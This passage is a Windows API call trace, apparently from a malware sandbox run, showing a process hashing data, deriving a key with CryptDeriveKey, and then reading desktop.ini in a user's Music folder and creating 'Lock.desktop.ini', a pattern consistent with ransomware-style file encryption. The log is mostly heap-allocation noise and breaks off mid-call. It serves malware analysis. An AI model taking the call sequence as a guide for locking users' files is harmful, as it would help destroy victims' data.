dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.646] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.646] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0205.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaad98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0205.646] CryptHashData (hHash=0x9e2078, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0205.646] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.646] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.646] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.647] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaafc0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0205.647] CryptDeriveKey (in: hProv=0xa7c000, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1eb8) returned 1 [0205.647] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.647] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0205.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0205.647] CryptDestroyHash (hHash=0x9e2078) returned 1 [0205.648] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0205.648] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.649] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0205.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0205.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0205.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0205.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0205.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0205.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0205.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0205.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0205.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0205.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75000 [0205.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.654] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0205.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75000 | out: hHeap=0x2af0000) returned 1 [0205.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0205.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0205.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0205.655] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac [0205.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0205.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0205.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0205.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0205.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0205.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0205.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0205.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0205.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ee020 [0205.660] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0205.660] ReadFile (in: hFile=0x50c, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x1f8, lpOverlapped=0x0) returned 1 [0205.661] ReadFile (in: hFile=0x50c, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0205.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0205.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a683a8 [0205.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ee020 | out: hHeap=0x2af0000) returned 1 [0205.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0205.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0205.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a754d0 [0205.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0205.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a683a8 [0205.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0205.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0205.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0205.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0205.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0205.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0205.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0205.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0205.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0205.666] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0205.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0205.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a683a8 [0205.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0205.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0205.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0205.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0205.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a756d0 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0205.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0205.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0205.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0205.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0205.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0205.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0205.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0205.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0205.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0205.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0205.668] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0205.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0205.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0205.668] RtlAllocateHeap (HeapHandle=0x2af0000, 